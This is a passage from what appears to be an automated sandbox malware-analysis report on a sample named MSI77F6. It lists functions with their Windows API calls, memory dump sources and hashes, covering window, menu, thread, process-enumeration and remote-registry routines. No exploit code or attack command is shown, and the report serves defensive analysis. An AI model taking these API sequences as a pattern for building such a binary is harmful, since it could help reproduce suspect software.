                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B1833
                                        • SysAllocString.OLEAUT32(00000000), ref: 007B1836
                                        • SysAllocString.OLEAUT32 ref: 007B1857
                                        • SysFreeString.OLEAUT32 ref: 007B1860
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007B187A
                                        • SysAllocString.OLEAUT32(?), ref: 007B1888
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: ebdb9fec32518f8ab0d4606d5b6b814fb1146210bfecc52d26982f9d4de7277c
                                        • Instruction ID: bc0209d569e940a2ea4817264e650f954be4acf5c13b4dea7f7862a0dd1e1993
                                        • Opcode Fuzzy Hash: ebdb9fec32518f8ab0d4606d5b6b814fb1146210bfecc52d26982f9d4de7277c
                                        • Instruction Fuzzy Hash: 88212475604204AFDB109BA8DC89DBE77ECFB093707908125F915DB261DA78EC41C764
                                        Function 007DA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                          • Part of subcall function 0078C619: GetStockObject.GDI32(00000011), ref: 0078C66B
                                          • Part of subcall function 0078C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007DA13B
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007DA148
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007DA153
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007DA162
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007DA16E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: ec30deeb48e69c6a6107d7cb350402b5f2b141be3ff37c4a169d11cc35100f29
                                        • Instruction ID: bc6c07a0a3f52cae75d08eb4fd5a5449d6176d19bbf616f3a34ae65fa4a67d1a
                                        • Opcode Fuzzy Hash: ec30deeb48e69c6a6107d7cb350402b5f2b141be3ff37c4a169d11cc35100f29
                                        • Instruction Fuzzy Hash: 701182B115021DBEEF115F65CC86EEB7F6DFF08798F014225FA08A6190C67A9C21DBA4
                                        Function 00794C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 00794C3E
                                          • Part of subcall function 007986B5: GetLastError.KERNEL32(?,00790127,007988A3,00794673,?,?,00790127,?,0077125D,00000058,?,?), ref: 007986B7
                                          • Part of subcall function 007986B5: __calloc_crt.LIBCMT ref: 007986D8
                                          • Part of subcall function 007986B5: GetCurrentThreadId.KERNEL32 ref: 00798701
                                          • Part of subcall function 007986B5: SetLastError.KERNEL32(00000000,00790127,007988A3,00794673,?,?,00790127,?,0077125D,00000058,?,?), ref: 00798719
                                        • CloseHandle.KERNEL32(?,?,00794C1D), ref: 00794C52
                                        • __freeptd.LIBCMT ref: 00794C59
                                        • RtlExitUserThread.NTDLL(00000000,?,00794C1D), ref: 00794C61
                                        • GetLastError.KERNEL32(?,?,00794C1D), ref: 00794C91
                                        • RtlExitUserThread.NTDLL(00000000,?,?,00794C1D), ref: 00794C98
                                        • __freefls@4.LIBCMT ref: 00794CB4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1445074172-0
                                        • Opcode ID: cad65e6fd059b98503f25b57d3be281a6394995730d431418fc30210bf4f2807
                                        • Instruction ID: d544df5e358b3675521f7057fdd7e872c7d524e4204f2de1f6604b2b976ee750
                                        • Opcode Fuzzy Hash: cad65e6fd059b98503f25b57d3be281a6394995730d431418fc30210bf4f2807
                                        • Instruction Fuzzy Hash: 3701BC70405601EFCF68BB64F90DD1D7BA6AF063147148519F5198B252EF3CDC42CAA2
                                        Function 0078C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0078C6C0
                                        • GetWindowRect.USER32(?,?), ref: 0078C701
                                        • ScreenToClient.USER32(?,?), ref: 0078C729
                                        • GetClientRect.USER32(?,?), ref: 0078C856
                                        • GetWindowRect.USER32(?,?), ref: 0078C86F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: fa555111e7037f6389c82eea37afd50463ed968b4905f28931ec0a5e49ee46d9
                                        • Instruction ID: 1e61e511d28d83abee95c01b354212598fbbf4993d92ba14bed513573dc96924
                                        • Opcode Fuzzy Hash: fa555111e7037f6389c82eea37afd50463ed968b4905f28931ec0a5e49ee46d9
                                        • Instruction Fuzzy Hash: 67B18C39A40249DBDF11CFA9C4807EDB7B1FF08710F14952AEC59EB250EB38AA40CB64
                                        Function 007B9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        • API String ID: 3253778849-0
                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction ID: 9e427d89476377a4cd828ff31cb37a0d22b4d2068d115b2475fc6599520252e7
                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction Fuzzy Hash: 3461A03051024AEBCF05EF60CC89FFE37A9AF05354F048454FA695B292DB789D05CB51
                                        Function 007D1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 007D1B09
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 007D1B17
                                        • __wsplitpath.LIBCMT ref: 007D1B45
                                          • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
                                        • _wcscat.LIBCMT ref: 007D1B5A
                                        • Process32NextW.KERNEL32(00000000,?), ref: 007D1BD0
                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 007D1BE2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID:
                                        • API String ID: 1380811348-0
                                        • Opcode ID: 5f7010dbdc4ce3c82f01d701b84aeed773dc5128131abe9a36a06783e0e93843
                                        • Instruction ID: 0b0d1f5839c730ca44cf1072e6f8675251b87a79062bdb64fe190b2dff1ab274
                                        • Opcode Fuzzy Hash: 5f7010dbdc4ce3c82f01d701b84aeed773dc5128131abe9a36a06783e0e93843
                                        • Instruction Fuzzy Hash: D2518371504305AFD720EF24C889EABB7ECEF88754F40491EF58997251EB74EA05CBA2
                                        Function 007D2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2FA0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D2FE0
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D3003
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D302C
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D306F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D307C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        • API String ID: 4046560759-0
                                        • Opcode ID: 677a347e6c8c4fe7ca9251c78334f4928ade1e5a157eb116d7269311aaf68032
                                        • Instruction ID: 3898ba438a7edb4d2b9965540d7ee0b142e9816ed9e8f9de9548e714b109f36d
                                        • Opcode Fuzzy Hash: 677a347e6c8c4fe7ca9251c78334f4928ade1e5a157eb116d7269311aaf68032
                                        • Instruction Fuzzy Hash: 0C516A71108204EFC715EF64C889E6AB7F9BF88304F04891EF585872A1DB79EA15CB52
                                        Function 0078DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$_wcscat
                                        • String ID:
                                        • API String ID: 2037614760-0
                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction ID: ddcfcf045b38ce32d4b99a4482c4ddb45b578cca5cc95f9d0a3aa113e5e01d76
                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction Fuzzy Hash: C351D070A40215EECF21BF99D4459BDB7B1EF08320F50804AF540AB2D2DBBC9E52D7A0
                                        Function 007B2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007B2AF6
                                        • VariantClear.OLEAUT32(00000013), ref: 007B2B68
                                        • VariantClear.OLEAUT32(00000000), ref: 007B2BC3
                                        • _memmove.LIBCMT ref: 007B2BED
                                        • VariantClear.OLEAUT32(?), ref: 007B2C3A
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007B2C68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                        • String ID:
                                        • API String ID: 1101466143-0
                                        • Opcode ID: 02979575eb77c9f6d6443542b178eeb4a00bc1ae4c46acf76ca2d9fd19a8b3fd
                                        • Instruction ID: 8dbc1c463b7d6e131d5866d6dab3d429fe499a14087d7e8578c1891af50f3981
                                        • Opcode Fuzzy Hash: 02979575eb77c9f6d6443542b178eeb4a00bc1ae4c46acf76ca2d9fd19a8b3fd
                                        • Instruction Fuzzy Hash: 44517CB5A00209EFCB24CF58C884AAAB7B9FF4C314B158559ED59DB311E734E952CFA0
                                        Function 007D82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 007D833D
                                        • GetMenuItemCount.USER32(00000000), ref: 007D8374
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D839C
                                        • GetMenuItemID.USER32(?,?), ref: 007D840B
                                        • GetSubMenu.USER32(?,?), ref: 007D8419
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D846A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountMessagePostString
                                        • String ID:
                                        • API String ID: 650687236-0
                                        • Opcode ID: ea9a8d5edbb88bf18c75b1520d7736135a6197674b856f8b4b48d72c57694c2c
                                        • Instruction ID: 5e1c6ed8ea6a98f7d134fc3257ce33ab2ea145ced363d62fd003a44977951dd8
                                        • Opcode Fuzzy Hash: ea9a8d5edbb88bf18c75b1520d7736135a6197674b856f8b4b48d72c57694c2c
                                        • Instruction Fuzzy Hash: A951CE31A00215EFCF50EFA8C845AAEB7F4EF48710F10845AE905BB351CB38AE01CB91
                                        Function 007B54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007B552E
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B5579
                                        • IsMenu.USER32(00000000), ref: 007B5599
                                        • CreatePopupMenu.USER32 ref: 007B55CD
                                        • GetMenuItemCount.USER32(000000FF), ref: 007B562B
                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B565C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        • API String ID: 3311875123-0
                                        • Opcode ID: 00e0196fa5192a9d207df51112bf2bc44d936af15dd760680741b69a62f11b3a
                                        • Instruction ID: 28014a1ee3babd904fcc2b1651a2c8dee8a850aa5054552ef9dca560c16af0ec
                                        • Opcode Fuzzy Hash: 00e0196fa5192a9d207df51112bf2bc44d936af15dd760680741b69a62f11b3a
                                        • Instruction Fuzzy Hash: 4351F270A00B49EFDF21CF68D888BEDBBF6AF05718F544119E8159B290E3B89D44CB51
                                        Function 0078B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0078B1C1
                                        • GetWindowRect.USER32(?,?), ref: 0078B225
                                        • ScreenToClient.USER32(?,?), ref: 0078B242
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0078B253
                                        • EndPaint.USER32(?,?), ref: 0078B29D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                        • String ID:
                                        • API String ID: 1827037458-0
                                        • Opcode ID: 5fd5100b9d2560d1ae8555f7ab577fe1979d59503dd60fd3165231b164eba4a2
                                        • Instruction ID: e2b4eb170a4112474a5993f827b50163e57d03941d752c0dcc3cd7775165799f
                                        • Opcode Fuzzy Hash: 5fd5100b9d2560d1ae8555f7ab577fe1979d59503dd60fd3165231b164eba4a2
                                        • Instruction Fuzzy Hash: 5841AD70100200EFCB21EF25DC88FBA7BE8FB59760F040A69F9A5872A1C7389C45DB65
                                        Function 007DE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00831810,00000000,?,?,00831810,00831810,?,007EE2D6), ref: 007DE21B
                                        • EnableWindow.USER32(?,00000000), ref: 007DE23F
                                        • ShowWindow.USER32(00831810,00000000,?,?,00831810,00831810,?,007EE2D6), ref: 007DE29F
                                        • ShowWindow.USER32(?,00000004,?,?,00831810,00831810,?,007EE2D6), ref: 007DE2B1
                                        • EnableWindow.USER32(?,00000001), ref: 007DE2D5
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DE2F8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 7dcd516c17c1a55cbf45ed88c57a940c6623437669cb895008ecbabfed1d10f6
                                        • Instruction ID: 2e401cd318cfea0d327e7b17aa5fba3c87e6c831c83609c575ee9eef014a85f2
                                        • Opcode Fuzzy Hash: 7dcd516c17c1a55cbf45ed88c57a940c6623437669cb895008ecbabfed1d10f6
                                        • Instruction Fuzzy Hash: A3415035600941EFDB26DF14C899BA47BF5BB06314F1C81BAEA588F3A2C775B841CB91
                                        Function 007C1BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 00773BCF: _wcscpy.LIBCMT ref: 00773BF2
                                        • _wcstok.LIBCMT ref: 007C1D6E
                                        • _wcscpy.LIBCMT ref: 007C1DFD
                                        • _memset.LIBCMT ref: 007C1E30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
